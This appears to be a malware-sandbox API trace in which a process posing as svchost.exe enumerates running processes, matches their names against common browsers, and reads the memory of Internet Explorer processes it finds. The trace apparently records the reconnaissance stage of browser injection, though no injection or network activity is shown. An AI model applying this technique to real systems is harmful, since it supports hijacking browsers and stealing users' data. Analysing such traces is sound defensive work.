	[0203.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.533] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.533] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0203.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.534] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.534] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0203.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x262c
	[0203.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.535] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0203.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.535] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.536] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0203.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.536] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.536] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0203.537] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2630
	[0203.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.537] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0203.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.538] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.538] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0203.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.538] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.538] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0203.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2634
	[0203.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.539] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0203.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.539] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.540] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0203.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.540] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.540] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0203.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x2638
	[0203.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.541] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0203.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.541] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.542] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0203.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.542] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.542] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0203.543] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x263c
	[0203.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.543] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0203.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.544] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.544] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0203.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.545] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.545] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0203.546] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2640
	[0203.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.546] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0203.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.547] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.547] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0203.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.548] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.548] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0203.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2644
	[0203.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.549] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0203.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.552] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.553] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0203.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.553] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.554] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0203.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2648
	[0203.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.555] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0203.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.555] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.556] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0203.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.556] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.556] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0203.557] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x264c
	[0203.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.557] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0203.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.557] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0203.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.558] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0203.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.558] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.558] NtQueryInformationProcess (in: ProcessHandle=0x264c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0203.558] ReadProcessMemory (in: hProcess=0x264c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0203.558] ReadProcessMemory (in: hProcess=0x264c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0203.558] ReadProcessMemory (in: hProcess=0x264c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0203.558] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0203.559] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0203.559] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2650
	[0203.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.559] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0203.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.560] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0203.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.560] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0203.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.560] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.560] NtQueryInformationProcess (in: ProcessHandle=0x2650, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0203.561] ReadProcessMemory (in: hProcess=0x2650, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0203.561] ReadProcessMemory (in: hProcess=0x2650, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0203.561] ReadProcessMemory (in: hProcess=0x2650, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0203.561] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0203.561] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0203.562] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2654
	[0203.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.562] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0203.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.562] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.562] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0203.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.563] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.563] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0203.564] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x2658
	[0203.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.564] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0203.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.564] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.564] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0203.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.565] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.565] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.566] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x265c
	[0203.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.566] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.566] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.566] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.567] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.567] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.568] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.568] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2660
	[0203.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.568] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.569] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.569] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.569] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.570] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0203.570] CloseHandle (hObject=0x188) returned 1
	[0203.570] Sleep (dwMilliseconds=0x64) 
	[0203.674] GetCurrentProcessId () returned 0x110
	[0203.674] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0203.677] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0203.679] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0203.680] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0203.681] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2664
	[0203.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.682] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.682] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.683] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.683] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.684] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0203.685] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x2668
	[0203.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.685] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.686] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.687] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.687] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.687] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0203.689] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x266c
	[0203.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.689] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0203.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.689] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.690] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0203.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.690] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.690] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0203.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2670
	[0203.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.691] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.692] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.692] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.692] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.692] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0203.693] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2674
	[0203.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.693] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0203.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.693] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.694] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0203.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.694] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.694] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0203.695] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2678
	[0203.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.695] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0203.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.695] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.696] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0203.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.696] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.696] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0203.697] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x267c
	[0203.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.697] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0203.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.697] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.698] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0203.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.698] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
